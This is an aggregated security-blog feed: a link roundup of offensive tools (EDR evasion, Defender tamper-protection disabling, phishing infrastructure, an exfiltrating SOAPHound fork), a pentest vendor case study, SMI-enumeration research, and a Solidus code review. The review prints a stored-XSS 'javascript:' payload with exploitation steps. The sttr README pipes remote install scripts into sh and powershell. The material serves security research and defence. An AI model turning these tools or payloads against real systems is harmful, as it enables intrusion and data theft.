  • Inside the Box: Malware's New Playground - Malware groups are using the BoxedApp product to evade detection. This mirrors earlier efforts that used VMprotect. If you can pay a modest price for a commercial packer that will help you evade EDR, many financially motivated actors will do so. Are you using commercial packers in your adversary simulations?
  • Hacking Millions of Modems (and Investigating Who Hacked My Modem) - A hacker discovers his modem is compromised, and through the course of investigating finds a way to hack any Cox customer's modem.
  • Becoming any Android app via Zygote command injection - Meta's red team discovered a vulnerability in Android (now patched) that allows an attacker with the WRITE_SECURE_SETTINGS permission, which is held by the ADB shell and certain privileged apps, to execute arbitrary code as any app on a device. By doing so, they could read and write any app's data, make use of per-app secrets and login tokens, change most system configuration, unenroll or bypass Mobile Device Management, and more. The exploit involves no memory corruption, meaning it worked unmodified on virtually any device running Android 9 or later, and persists across reboots. This feels like a vulnerability that will make some advanced actors very upset to see patched.
  • Deep diving into F5 Secure Vault - After Exploiting an F5 Big-IP, @myst404_ set their sights on the "Secure Vault." Spoiler: it isn't all that secure.
  • Windows Internals: Dissecting Secure Image Objects - Part 1 - The king of technical deep dives is back! Funny that this is actually a third order blog post spawned from research originally into the Kernel Control Flow Guard (Kernel CFG) feature. As always, Connor delivers a great, highly technical post.
  • Bypassing Veeam Authentication CVE-2024-29849 - "This vulnerability in Veeam Backup Enterprise Manager allows an unauthenticated attacker to log in to the Veeam Backup Enterprise Manager web interface as any user. - Critical"
  • [PDF] Paged Out! #4 (14MB, beta1 build) - A great modern zine.
  • Spray passwords, avoid lockouts - A very compreshensive look at Windows password policy. conpass is the new tool dropped to implement the ideas presented in the post.
  • Develop your own C# Obfuscator - Sure, you've used ConfuserEx, but what if you wrote your own C# obfuscator?
  • Bypassing EDR NTDS.dit protection using BlueTeam tools. - Love to see traitorware in the wild.
  • One Phish Two Phish, Red Teams Spew Phish - How to give your phishing domains a reputation boost.

Tools and Exploits

  • MAT - This tool, programmed in C#, allows for the fast discovery and exploitation of vulnerabilities in MSSQL servers.
  • AmperageKit - One stop shop for enabling Recall in Windows 11 version 24H2 on unsupported devices.
  • omakub - Opinionated Ubuntu Setup.
  • chromedb - Read Chromium data (namely, cookies and local storage) straight from disk, without spinning up the browser.
  • The_Shelf - Retired TrustedSec Capabilities. See Introducing The Shelf for more.
  • RflDllOb - Reflective DLL Injection Made Bella.
  • CVE-2024-29849 - Veeam Backup Enterprise Manager Authentication Bypass (CVE-2024-29849).
  • rsescan - RSEScan is a command-line utility for interacting with the RSECloud. It allows you to fetch subdomains and IPs from certificates for a given domain or organization.
  • MDE_Enum - comprehensive .NET tool designed to extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules without Admin privileges.
  • Disable-TamperProtection - A POC to disable TamperProtection and other Defender / MDE components.

New to Me and Miscellaneous

This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!

  • How Malware Can Bypass Transparency Consent and Control (CVE-2023-40424) - CVE-2023-40424 is a vulnerability that allows a root-level user to create a new user with a custom Transparency Consent and Control (TCC) database in macOS, which can then be used to access other users' private data. It was fixed in 2023 in macOs Sonoma (but not backported to older versions!).
  • PsMapExec - A PowerShell tool that takes strong inspiration from CrackMapExec / NetExec.
  • Evilginx-Phishing-Infra-Setup - Evilginx Phishing Engagement Infrastructure Setup Guide.
  • File-Tunnel - Tunnel TCP connections through a file.
  • awesome-cicd-attacks - Practical resources for offensive CI/CD security research. Curated the best resources I've seen since 2021.
  • JA4+ Database - Download, read, learn about, and contribute to augment your organization's JA4+ network security efforts
  • detection-rules is the home for rules used by Elastic Security. This repository is used for the development, maintenance, testing, validation, and release of rules for Elastic Security's Detection Engine.
  • openrecall - OpenRecall is a fully open-source, privacy-first alternative to proprietary solutions like Microsoft's Windows Recall. With OpenRecall, you can easily access your digital history, enhancing your memory and productivity without compromising your privacy.
  • knock - Knock Subdomain Scan.
  • ubiquity-toolkit - A collection of statically-linked tools targeted to run on almost any linux system.
  • SOAPHound - A fork of SOAPHound that uses an external server to exfiltrate the results vs dropping them on disk for improved OPSEC.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing.

The Critical Role of Autonomous Penetration Testing in Strengthening Defense in Depth

10 June 2024 at 19:21

A Modern Approach to Comprehensive Cybersecurity

Defense in Depth (DID) is crucial in cybersecurity because it employs multiple layers of security controls and measures to protect information systems and data. This multi-layered approach helps ensure that if one defensive layer is breached, others continue to provide protection, significantly reducing the likelihood of a successful cyber-attack. By combining physical security, network security, endpoint protection, application security, data security, identity and access management, security policies, monitoring, backup and recovery, and redundancy, organizations can create a robust and resilient security posture that is adaptable to evolving threats. This comprehensive strategy is essential for safeguarding sensitive information, maintaining operational integrity, and complying with regulatory requirements.

However, DID is not a panacea. While it greatly enhances an organization’s security, it cannot guarantee absolute protection. The complexity and layered nature of DID can lead to challenges in management, maintenance, and coordination among different security measures. Additionally, sophisticated attackers continuously develop new methods to bypass multiple layers of defense, such as exploiting zero-day vulnerabilities or using social engineering techniques to gain access and exploit an environment. This highlights the importance of complementing DID with other strategies, such as regular security assessments, autonomous penetration testing, continuous monitoring, and fostering a security-aware culture within an organization. These additional measures help to identify and address emerging threats promptly, ensuring a more dynamic and proactive security approach.

Mission:

JTI Cybersecurity helps organizations around the world improve their security posture and address cybersecurity challenges. They work with small businesses, enterprises, and governments whose customers demand the highest levels of trust, security, and assurance in the protection of their sensitive data and mission-critical operations. JTI provides prudent advice and solutions when following best practices isn’t enough to protect the interests of their clients and the customers they serve.

  • Year Founded: 2020
  • Number of Employees: 5-10
  • Operational Reach: Global

Threat Intelligence

In November 2023, the prolific ransomware group LockBit confirmed a cyberattack on Boeing that impacted its parts and distribution business, as well as part of its global services division. The incident occurred following claims from LockBit that they had breached Boeing’s network and stolen sensitive data. Although Boeing confirmed that flight safety was not compromised, the LockBit group initially threatened to leak and expose the stolen sensitive data if Boeing did not negotiate. This incident not only underscores the persistent threats faced by major corporations but also highlights the importance of implementing robust cybersecurity measures.

Is the concept of DID dead?

In a recent interview with Jon Isaacson, Principal Consultant at JTI Cybersecurity, he highlights that, “some marketing material goes as boldly as saying DID doesn’t work anymore.” However, Jon goes on to say that “DID is still a good strategy, and generally when it fails, it’s not because a layer of the onion failed…it’s because the term is overused, and the organization probably didn’t have any depth at all.” While this is a concept that’s been around for quite some time, its importance hasn’t diminished. In fact, as cyber threats evolve and become increasingly sophisticated, the need for a layered approach to security remains critical.

However, it’s also true that the term can sometimes be overused or misapplied, leading to a perception of it being outdated or ineffective. This can happen if organizations simply pay lip service to the idea of defense in depth without implementing meaningful measures at each layer or if they rely too heavily on traditional approaches without adapting to new threats and technologies.

In today’s rapidly changing threat landscape, organizations need to continually reassess and update their security strategies to ensure they’re effectively mitigating risks. This might involve integrating emerging technologies like autonomous pentesting, adopting a zero-trust security model, or implementing robust incident response capabilities alongside traditional defense in depth measures. While defense in depth may be considered a fundamental principle, its implementation and effectiveness depend on how well it’s adapted to meet the challenges of modern cybersecurity threats.

“While DID definitely helps shore up your defenses, without taking an attackers perspective by considering actual attack vectors that they can use to get in, you really can’t be ready.”

DID and the attacker’s perspective

In general, implementing a DID approach to an organization’s security posture helps slow down potential attacks and often challenges threat actors from easily exploiting an environment. Additionally, this forces attackers to use various tactics, techniques, and procedures (TTPs) to overcome DID strategies, and maneuver across layers to find weak points and exploit the path of least resistance. An attacker’s ability to adapt quickly, stay agile, and persist creates challenges for security teams attempting to stay ahead of threats and keep their cyber landscape secure.

As Jon explains, an “adversary is not going to be sitting where Tenable Security Center (for example) is installed with the credentials they have poking through the registry…that’s not how the adversary works…many organizations try to drive their vulnerability management programs in a compliance fashion, ticking off the boxes, doing their required scans, and remediating to a certain level…but that doesn’t tell you anything from an adversary’s perspective.” One of the only ways to see things from an attacker’s perspective is to attack your environment as an adversary would.

Enter NodeZero

Before discovering NodeZero, Jon was working through the best way to build his company, while offering multiple services to his clients. He mentions that “when JTI first started, it was just him, bouncing back and forth between pentesting and doing a SOC2 engagement…early on, there weren’t a massive amount of pentests that had to be done and most were not huge…so doing a lot manually wasn’t a big deal.” However, with his business booming, Jon got to a point where doing a pentest 100% manually was just no longer a thing and he required a solution that was cost effective and that he could run continuously to scale his capabilities for his customers.

Additionally, Jon toyed with the idea of building custom scripts and having a solution automate them so at least some of the work was done for him, weighing his options between semi-automated or buying a solution. Jon first learned of Horizon3.ai through one of his customers, who was also exploring the use of an autonomous pentesting solution. So, after poking around a few competitors of Horizon3.ai that didn’t yield the results he was hoping for, he booked a trial.

NodeZero doesn’t miss anything

At the time, Jon was skeptical that any platform could outperform manual pentesting while supporting his need for logs and reporting. But, as he explains, “there was nothing that [Node Zero] really missed [compared to his previous manual pentests] and there were cases where [NodeZero] would find something that was not found through manual testing.”

After initial trial testing, Jon dove headfirst when he was onboarded with Horizon3.ai and started using NodeZero for many of his pentesting engagements. Looking through the eyes of an attacker, “we can drop NodeZero into an environment and let it do its thing…NodeZero not only enumerates the entire attack surface, but also finds vulnerabilities and attempts to exploit them as an attacker would.” This enables Jon to provide more value to his clients by digging into results to determine actual business impacts, provide specific recommendations for mitigations or remediations, and verify those fixes worked. “[End users] can get a lot of value out of NodeZero even if they aren’t a security expert or pentester because you really can just click it, send it, and forget it…the best bang for their buck is the laundry list of things they [end users] can do to secure their environment every time they run it [NodeZero].”

“NodeZero is a really great tool for both consultants and pentesters…because for us pentesters, we can use it [NodeZero] kind of like the grunts or infantry of the military…just send it in to go blow everything up and then we [pentesters] can be a scalpel, and really dig into and spend time on the areas where things are potentially bad.”

So what?

DID is not dead and is a critical concept in cybersecurity, leveraging multiple layers of security controls to protect information systems and data. By integrating various security measures, organizations create a robust and resilient security posture. This layered approach ensures that if one defense layer is breached, others continue to provide protection, significantly reducing the likelihood of a successful cyber-attack.

However, DID is not a cure-all; it has its limitations. The complexity and layered nature can pose challenges in management and maintenance, and sophisticated attackers may still find ways to bypass defenses using advanced techniques like zero-day exploits or social engineering. Therefore, it’s essential to complement DID with autonomous penetration testing, continuous monitoring, and fostering a security-aware culture to address emerging threats proactively and dynamically.

Download PDF

The post The Critical Role of Autonomous Penetration Testing in Strengthening Defense in Depth appeared first on Horizon3.ai.

Unlocking data privacy: Insights from the data diva | Guest Debbie Reynolds

By: Infosec
10 June 2024 at 18:00

Today on Cyber Work, I’m very excited to welcome Debbie Reynolds, the Data Diva herself, to discuss data privacy. Reynolds developed a love of learning about data privacy since working in library science, and she took it through to legal technologies. She now runs her own data privacy consultancy and hosts the long-running podcast “The Data Diva Talks Privacy Podcast.” We talk about data privacy in all its complex, nerdy, and sometimes frustrating permutations, how GDPR helped bring Reynolds to even greater attention, how AI has added even more layers of complexity and some great advice for listeners ready to dip their toes into the waters of a data privacy practitioner career.

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Data privacy
3:29 - First, getting into computers
7:46 - Inspired by GDPR
9:00 - Pivoting to a new cybersecurity career
12:01 - Learning different privacy regulation structures
15:17 - Process of building data systems 
17:41 - Worst current data privacy issue
20:57 - The best in AI and data privacy
22:15 - The Data Diva Podcast
25:24 - The role of data privacy officer
30:36 - Cybersecurity consulting
36:21 - Positives and negatives of data security careers
39:34 - Reynolds' typical day
41:11 - How to get hired in data privacy
48:38 - The best piece of cybersecurity career advice
50:25 - Learn more about the Data Diva
51:14 - Outro

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.

💾

Enumerating System Management Interrupts

10 June 2024 at 16:00

System Management Interrupts (SMI) provide a mechanism for entering System Management Mode (SMM) which primarily implements platform-specific functions related to power management. SMM is a privileged execution mode with access to the complete physical memory of the system, and to which the operating system has no visibility. This makes the code running in SMM an ideal target for malware insertion and potential supply chain attacks. Accordingly, it would be interesting to develop a mechanism to audit the SMIs present on a running system with the objective of cross-referencing this information with data provided by the BIOS supplier. This could help ensure that no new firmware entry-points have been added in the system, particularly in situations where there is either no signature verification for the BIOS, or where such verification can be bypassed by the attacker.

The section 32.2, “System Management Interrupt (SMI)” of Intel’s System Programming Guide [1], states the following regarding the mechanisms to enter SMM and its assigned system priority:

“The only way to enter SMM is by signaling an SMI through the SMI# pin on the processor or through an SMI message received through the APIC bus. The SMI is a nonmaskable external interrupt that operates independently from the processor’s interrupt- and exception-handling mechanism and the local APIC. The SMI takes precedence over an NMI and a maskable interrupt. SMM is non-reentrant; that is, the SMI is disabled while the processor is in SMM.”

Many mainboard Chipsets (PCH), such as the Intel 500 series chipset family [2], expose the I/O addresses B2h and B3h, enabling the signaling of the SMI# pin on the processor. Writting a byte-value to the address B2h signals the SMI code that corresponds to the written value. The address B3h is used for passing information between the processor and the SMM and needs to be written before the SMI is signaled.

Chipsec [3] is the industry standard tool for auditing the security of x86 platform firmware. It is open source and maintained by Intel. Chipsec includes a module called smm_ptr, which searches for SMI handlers that result in the modification of an allocated memory buffer. It operates by filling the allocated memory with an initial value that is checked after every SMI call. It then iterates through all specified SMI codes, looking for changes in the buffer, the address of which is passed to the SMI via the processor’s general-purpose registers (GPRS).

Although highly useful as a reference approach to trigger SMIs by software, Chipsec’s smm_ptr module does not fulfill the objective of enumerating them. Only when the SMI has an observable change in the passed memory buffer does the module consider it vulnerable and flags its existance.

Since our goal is to enumerate SMIs, I considered measuring the time it takes for the SMI to execute as a simple measure of the complexity of its handler. The hypothesis is that an SMI code ignored by the BIOS would result in a shorter execution time compared to when the SMI is properly attended. With this objective in mind, I added the ‘scan’ mode to the smm_ptr module [4].

The scan mode introduces a new ioctl command to the Chipsec’s kernel module that triggers the SMI and returns the elapsed time to the caller. This mode maintains an average of the time it takes for an SMI to execute and flags whenever one exceeds a defined margin.

In the initial tests performed, an unexpected behaviour was observed in which, with a periodicity of one second, a ten times larger runtime appeared for the same SMI code. To confirm these outliers were only present when the SMI was signaled, I implemented an equivalent test measuring the time spent by an equivalently long time-consuming loop replacing the SMI call. The results of both tests are presented below.

CPU counts per SMI call
CPU counts per test loop execution

The details of each long-running SMI are detailed next, where ‘max’ and ‘min’ values are the maximum and minimum measured elapsed time in CPU counts, ‘total’ is the number of SMIs signaled, ‘address’ shows the register used for passing the address of the allocated buffer, and ‘data’ is the value written to the I/O address B3h.

SMI: 0, max: 5023124, min: 680534, count: 7, total: 12288,
  long-running SMIs: [
  {'time offset': 278.017 ms, 'counts': 3559564, 'rcx': 11, 'address': rbx, 'data': 0x09},
  {'time offset': 1278.003 ms, 'counts': 3664844, 'rcx': 14, 'address': rbx, 'data': 0x2C},
  {'time offset': 2277.865 ms, 'counts': 4244506, 'rcx': 1, 'address': rbx, 'data': 0x50},
  {'time offset': 3277.685 ms, 'counts': 4950032, 'rcx': 4, 'address': rsi, 'data': 0x73},
  {'time offset': 4277.681 ms, 'counts': 5023124, 'rcx': 8, 'address': rbx, 'data': 0x96},
  {'time offset': 5277.898 ms, 'counts': 4347570, 'rcx': 11, 'address': rbx, 'data': 0xB9},
  {'time offset': 6277.909 ms, 'counts': 4374736, 'rcx': 14, 'address': rsi, 'data': 0xDC}]

I don’t know the reason for these periodic lengthy SMIs. I can only speculate these might be NMI interrupts being blocked by SMM and serviced with priority right after exiting SMM and before the time is measured. In any case, I opted for performing a confirmation read once a long-running SMI is found, which effectively filters out these long measurements, resulting in the output shown below. It has an average elapsed time of 770239.23 counts and standard deviation of 7377.06 counts (0.219749 ms and 2.104e-06 seconds respectively on a 3.5 GHz CPU).

CPU counts per SMI filtered out the outliers

To discard any effects of the values passed to the SMI, I ran the test by repeatedly signaling the same SMI code and parameters. Below is the result using the confirmation read strategy, showing an average value of 769718.88 counts (0.219600 ms) and standard deviation of 6524.88 counts (1.861e-06 seconds).

CPU counts per SMI filtered out the outliers and using the same SMI parameters

The proposed scan mode is effective in identifying long-running SMIs present in the system. However, it is unable to find others that fall within the bounds of the defined threshold. For example, using an arbitrary threshold of 1/3 times larger than the average, the implementation was not successful noticing some of the SMIs flagged by the smm_ptr’s fuzz and fuzzmore modes. The main reasons are the large deviation observed and the challenge of dealing with a system for which no confirmed SMI codes are provided, making it difficult to calibrate the algorithm and establish a suitable threshold value.

The implementation has been merged into the upstream version of Chipsec and will be included in the next release [5].

[1] Intel® 64 and IA-32 Architectures Software Developer’s Manual Volume 3 (3A, 3B, 3C, 3D): System Programming Guide
[2] Intel® 500 Series Chipset Family On- Package Platform Controller Hub Datasheet, Volume 1 of 2. Rev. 007, September 2021.
[3] https://chipsec.github.io/
[4] https://github.com/nccgroup/chipsec/commit/eaad11ad587d951d3720c43cbce6d068731b7cdb
[5] https://github.com/chipsec/chipsec/pull/2141

Solidus — Code Review

Solidus — Code Review

As a Research Engineer at Tenable, we have several periods during the year to work on a subject of our choice, as long as it represents an interest for the team. For my part, I’ve chosen to carry out a code review on a Ruby on Rails project.

The main objective is to focus on reviewing code, understanding it and the various interactions between components.

I’ve chosen Solidus which is an open-source eCommerce framework for industry trailblazers. Originally the project was a fork of Spree.

Developed with the Ruby on Rails framework, Solidus consists of several gems. When you require the solidus gem in your Gemfile, Bundler will install all of the following gems:

  • solidus_api (RESTful API)
  • solidus_backend (Admin area)
  • solidus_core (Essential models, mailers, and classes)
  • solidus_sample (Sample data)

All of the gems are designed to work together to provide a fully functional ecommerce platform.

https://www.tenable.com/research

Project selection

Solidus wasn’t my first choice, I originally wanted to select Zammad, which is a web-based open source helpdesk/customer support system also developed with Ruby on Rails.

The project is quite popular and, after a quick look, has a good attack surface. This type of project is also interesting because for many businesses, the support/ticketing component is quite critical, identifying a vulnerability in a project such as Zammad almost guarantees having an interesting vulnerability !

For various reasons, whether it’s on my professional or personal laptop, I need to run the project in a Docker, something that’s pretty common today for a web project but :

Zammad is a project that requires many bricks such as Elasticsearch, Memcached, PostgresQL & Redis and although the project provided a ready-to-use docker-compose, as soon as I wanted to use it in development mode, the project wouldn’t initialize properly.

Rather than waste too much time, I decided to put it aside for another time (for sure) and choose another project that seemed simpler to get started on.

After a tour of Github, I came across Solidus, which not only offers instructions for setting up a development environment in just a few lines, but also has a few public vulnerabilities.

For us, this is generally a good sign in terms of communication in case of a discovery. This shows that the publisher is open to exchange, which is unfortunately not always the case.

The reality is that I also had a few problems with the Solidus Dockerfile supplied, but by browsing the issues and making some modifications on my own I was able to quickly launch the project.

Project started with bin/dev cmd

Ruby on Rails Architecture & Attack Surface

Like many web frameworks, Ruby on Rails uses an MVC architecture, although this is not the theme of this blog post, a little reminder doesn’t hurt to make sure you understand the rest:

  • Model contains the data and the logic around the data (validation, registration, etc.)
  • View displays the result to the user
  • The Controller handles user actions and modifies model and view data. It acts as a link between the model and the view.

Another important point about Ruby on Rails is that this Framework is “Convention over Configuration”, which means that many choices are made for you, and means that all environments used will have similarities, which makes it easier to understand a project from an attacker’s point of view if you know how the framework works.

In a Ruby on Rails project, application routing is managed directly by the ‘config/routes.rb’ file. All possible actions are defined in this file !

As explained in the overview chapter, Solidus is composed of a set of gems (Core, Backend & API) designed to work together to provide a fully functional ecommerce platform.

These three components are independent of each other, so when we audit the Github Solidus/Solidus project, we’re actually auditing multiple projects with multiple distinct attack surfaces that are more or less interconnected.

Solidus has three main route files :

  • Admin Namespace SolidusAdmin::Engine
  • Backend Namespace Spree::Core::Engine
  • API Namespace Spree::Core::Engine

Two of the three files are in the same namespace, while Admin is more detached.

A namespace can be seen as a “group” that contains Classes, Constants or other Modules. This allows you to structure your project. Here, it’s important to understand that API and Backend are directly connected, but cannot interact directly with Admin.

If we take a closer look at the file, we can see that routes are defined in several ways. Without going into all the details and subtleties, you can either define your route directly, such as

get '/orders/mine', to: 'orders#mine', as: 'my_orders'

This means “The GET request on /orders/mine” will be sent to the “mine” method of the “Orders” controller (we don’t care about the “as: ‘my_orders” here).

module Spree
module Api
class OrdersController < Spree::Api::BaseController
#[...]
def mine
if current_api_user
@orders = current_api_user.orders.by_store(current_store).reverse_chronological.ransack(params[:q]).result
@orders = paginate(@orders)
else
render "spree/api/errors/unauthorized", status: :unauthorized
end
end
#[...]

Or via the CRUD system using something like :

resources :customer_returns, except: :destroy

For the explanations, I’ll go straight to what is explained in the Ruby on Rails documentation :

“In Rails, a resourceful route provides a mapping between HTTP verbs and URLs to controller actions. By convention, each action also maps to a specific CRUD operation in a database.”

So here, the :customer_returns resource will link to the CustomerReturns controller for the following URLs :

  • GET /customer_returns
  • GET /customer_returns/new
  • POST /customer_returns
  • GET /customer_returns/:id
  • GET /customer_returns/:id/edit
  • PATCH/PUT /customer_returns/:id
  • ̶D̶E̶L̶E̶T̶E̶ ̶/̶c̶u̶s̶t̶o̶m̶e̶r̶_̶r̶e̶t̶u̶r̶n̶s̶/̶:̶i̶d̶ is ignored because of “except: :destroy”

So, with this, it’s easy to see that Solidus has a sizable attack surface.

Static Code Analysis

This project also gives me the opportunity to test various static code analysis tools. I don’t expect much from these tools but as I don’t use them regularly, this allows me to see what’s new and what’s been developing.

The advantage of having an open source project on Github is that many static analysis tools can be run through a Github Action, at least… in theory.

Not to mention all the tools tested, CodeQL is the only one that I was able to run “out of the box” via a Github Action, the results are then directly visible in the Security tab.

Extract of vulnerabilities identified by CodeQL

Processing the results from all the tools takes a lot of time, many of them are redundant and I have also observed that some paid tools are in fact just overlays of open source tools such as Semgrep (the results being exactly the same / the same phrases).

Special mention to Brakeman, which is a tool dedicated to the analysis of Ruby on Rails code, the tool allows you to quickly and simply have some interesting path to explore in a readable manner.

Extract of vulnerabilities identified by Brakeman

Without going over all the discoveries that I have put aside (paths to explore). Some vulnerabilities are quick to rule out. Take for example the discovery “Polynomial regular expression used on uncontrolled data” from CodeQL :

In addition to seeming not exploitable to me, this case is not very interesting because it affects the admin area and therefore requires elevated privileges to be exploited.

Now with this “SQL Injection” example from Brakeman :

As the analysis lacks context, it does not know that in reality “price_table_name” does not correspond to a user input but to the call of a method which returns the name of a table (which is therefore not controllable by a user).

However, these tools remain interesting because they can give a quick overview of areas to dig.

Identifying a Solidus Website

Before getting into the nitty-gritty of the subject, it may be interesting to identify whether the visited site uses Solidus or not and for that there are several methods.

On the main shop page, it is possible to search for the following patterns :

<p>Powered by <a href="http://solidus.io/">Solidus</a></p>
/assets/spree/frontend/solidus_starter_frontend

Or check if the following JS functions are available :

Solidus()
SolidusPaypalBraintree

Or finally, visit the administration panel accessible at ‘/admin/login’ and look for one of the following patterns :

<img src="/assets/logo/solidus
<script src="/assets/solidus_admin/
solidus_auth_devise replaces this partial

Unfortunately, no technique seems more reliable than the others and these do not make it possible to determine the version of Solidus.

Using website as normal user

In order to get closer to the product, I like to spend time using it as a typical user and given the number of routes available, I thought I’d spend a little time there, but I was soon disappointed to see that for a classic user, there isn’t much to do outside the purchasing process. :

Once the order is placed, user actions are rather limited

  • See your orders
  • See a specific order (But no PDF or tracking)
  • Update your information (Only email and password)

We will just add that when an order is placed, an email is sent to the user and a new email is sent when the product is shipped.

The administration is also quite limited, apart from the classic actions of an ecommerce site (management of orders, products, stock, etc.) there is only a small amount of configuration that can be done directly from the panel.

For example, it is not possible to configure SMTP, this configuration must be done directly in the Rails project config

Authentication & Session management

Authentication is a crucial aspect of web application security. It ensures that only authorized individuals have access to the application’s features and sensitive data.

Devise is a popular, highly configurable and robust Ruby on Rails gem for user authentication. This gem provides a complete solution for managing authentication, including account creation, login, logout and password reset.

One reason why Devise is considered a robust solution is its ability to support advanced security features such as email validation, two-factor authentication and session management. Additionally, Devise is regularly updated to fix security vulnerabilities and improve its features.

When I set up my Solidus project, version 4.9.3 of Devise was used, i.e. the latest version available so I didn’t spend too much time on this part which immediately seemed to me to be a dead end.

Authorization & Permissions management

Authorization & permissions management is another critical aspect of web application security. It ensures that users only have access to the features and data that they are permitted to access based on their role or permissions.

By default, Solidus only has two roles defined

  • SuperUser : Namely the administrator, which therefore allows access to all the functionalities
  • DefaultCustomer : The default role assigned during registration, the basic role simply allowing you to make purchases on the site

To manage this brick, Solidus uses a gem called CanCanCan. Like Devise, CanCanCan is considered as a robust solution due to its ability to support complex authorization scenarios, such as hierarchical roles and dynamic permissions. Additionally, CanCanCan is highly configurable.

Furthermore, CanCanCan is highly tested and reliable, making it a safe choice for critical applications. It also has an active community of developers who can provide assistance and advice if needed.

Some Rabbit Holes

1/ Not very interesting Cross-Site Scripting

Finding vulnerabilities is fun, even more so if they are critical, but many articles do not explain that the search takes a lot of time and that many attempts lead to nothing.

Digging into these vulnerabilities, even knowing that they will lead to nothing, is not always meaningless.

Let’s take this Brakeman detection as an example :

Despite the presence of `:target => “_blank”` which therefore makes an XSS difficult to exploit (or via crazy combinations such as click wheel) I found it interesting to dig into this part of the code and understand how to achieve this injection simply because this concerns the administration part.

Here’s how this vulnerability could be exploited :

1/ An administrator must modify the shipping methods to add the `javascript:alert(document.domain)` as tracking URL

2/ A user must place an order

3/ An administrator must validate the order and add a tracking number

4/ The tracking URL will therefore correspond to the payload which can be triggered via a click wheel

By default, the only role being possible being an administrator the only possibility is that an administrator traps another administrator… in other words, far from being interesting

Note : According to Solidus documentation, in a configuration that is not the basic one, it would be possible for a user with less privileges to exploit this vulnerability

Although the impact and exploitation are very low, we have pointed out the weakness to Solidus. Despite several attempts to contact them, we have not received a response.
The vulnerability was published under
CVE-2024–4859

2/ Solidus, State Machine & Race Conditions

In an ecommerce site, I find that testing race conditions is a good thing because certain features are conducive to this test, such as discount tickets.

But before talking about race condition, we must understand the concept of State machine

A state machine is a behavioral model used in software development to represent the different states that an object or system can be in, as well as the transitions between those states. In the context of a web application, a state machine can be used to model the different states that a user or resource can be in, and the actions that can be performed to transition between those states.

For example, in Solidus, users can place orders. A user can be in one of several states with respect to an order, such as “pending”, “processing”, or “shipped”. The state machine would define these states and the transitions between them, such as “place order” (which transitions from “pending” to “processing”), “cancel order” (which transitions from “processing” back to “pending”), and “ship order” (which transitions from “processing” to “shipped”).

Using a state machine in a web application provides several benefits. First, it helps to ensure that the application is consistent and predictable, since the behavior of the system is clearly defined and enforced. Second, it makes it easier to reason about the application and debug issues, since the state of the system can be easily inspected and understood. Third, it can help to simplify the codebase, since complex logic can be encapsulated within the state machine.

If I talk about that, it’s because the Solidus documentation has a chapter dedicated to that and I think it’s quite rare to highlight it !

Now we can try to see if any race conditions are hidden in the use of a promotion code.

This section of the code being still in Spree (the ancestor of Solidus), I did not immediately get my hands on it, but in the case of a whitebox audit, it is sometimes easier to trace the code from an error in the site.

In this case, by applying the same promo code twice, the site indicates the error “The coupon code has already been applied to this order”

Then simply look for the error in the entire project code and then trace its use backwards to the method which checks the use of the coupon

It’s quite difficult to go into detail and explain all the checks but we can summarize by simply explaining that a coupon is associated with a specific order and as soon as we try to apply a new coupon, the code checks if it is already associated with the order or not.

So to summarize, this code did not seem vulnerable to any race conditions.

Presenting all the tests carried out would be boring, but we understand from reading these lines that the main building blocks of Solidus are rather robust and that on a default installation, I unfortunately could not find much.

So, maybe it is more interesting to focus on custom development, in particular extensions. On solidus, we can arrange the extensions according to 3 types

  • Official integrations : Listed on the main website, we mainly find extensions concerning payments
  • Community Extensions : Listed on a dedicated Github repository, we find various and varied extensions that are more or less maintained
  • Others Extensions : Extensions found elsewhere, but there’s no guarantee that they’ll work or that they’ll be supported

Almost all official extensions require integration with a 3rd party and will therefore make requests on a third party, which is what I wanted to avoid here.

Instead, I turned to the community extensions to test a few extensions for which I would have liked to have native functionality on the site, such as PDF invoice export.

For this, I found the Solidus Print Invoice plugin, which has not been maintained for 2 years. You might think that this is a good sign from an attacker’s point of view, except that in reality the plugin is not designed to work with Solidus 4, so the first step was to make it compatible so that it could be installed …

As indicated in the documentation, this plugin only adds PDF generation on the admin side.

To cut a long story short, this plugin didn’t give me anything new, and I spent more time installing it than I did understanding that I wouldn’t get any vulnerabilities from it.

I haven’t had a look at it, but it’s interesting to note that other plugins such as Solidus Friendly Promotions, according to its documentation, replace Solidus cores features and are therefore inherently more likely to introduce a vulnerability.

Conclusion

Presenting all the tests that can and have been carried out is also far too time-consuming. Code analysis really is time-consuming, so to claim that I’ve been exhaustive and analyzed the whole application would be false but, after spending a few days on Solidus, I think it’s a very interesting project from a security point of view.

Of course, I’d have liked to have been able to detail a few vulnerabilities, but this blog post tends to show that you can’t always be fruitful.


Solidus — Code Review was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Sttr - Cross-Platform, Cli App To Perform Various Operations On String


sttr is command line software that allows you to quickly run various transformation operations on the string.


// With input prompt
sttr

// Direct input
sttr md5 "Hello World"

// File input
sttr md5 file.text
sttr base64-encode image.jpg

// Reading from different processor like cat, curl, printf etc..
echo "Hello World" | sttr md5
cat file.txt | sttr md5

// Writing output to a file
sttr yaml-json file.yaml > file-output.json

:movie_camera: Demo

:battery: Installation

Quick install

You can run the below curl to install it somewhere in your PATH for easy use. Ideally it will be installed at ./bin folder

curl -sfL https://raw.githubusercontent.com/abhimanyu003/sttr/main/install.sh | sh

Webi

MacOS / Linux

curl -sS https://webi.sh/sttr | sh

Windows

curl.exe https://webi.ms/sttr | powershell

See here

Homebrew

If you are on macOS and using Homebrew, you can install sttr with the following:

brew tap abhimanyu003/sttr
brew install sttr

Snap

sudo snap install sttr

Arch Linux

yay -S sttr-bin

Scoop

scoop bucket add sttr https://github.com/abhimanyu003/scoop-bucket.git
scoop install sttr

Go

go install github.com/abhimanyu003/sttr@latest

Manually

Download the pre-compiled binaries from the Release! page and copy them to the desired location.

:books: Guide

  • After installation simply run sttr command.
// For interactive menu
sttr
// Provide your input
// Press two enter to open operation menu
// Press `/` to filter various operations.
// Can also press UP-Down arrows select various operations.
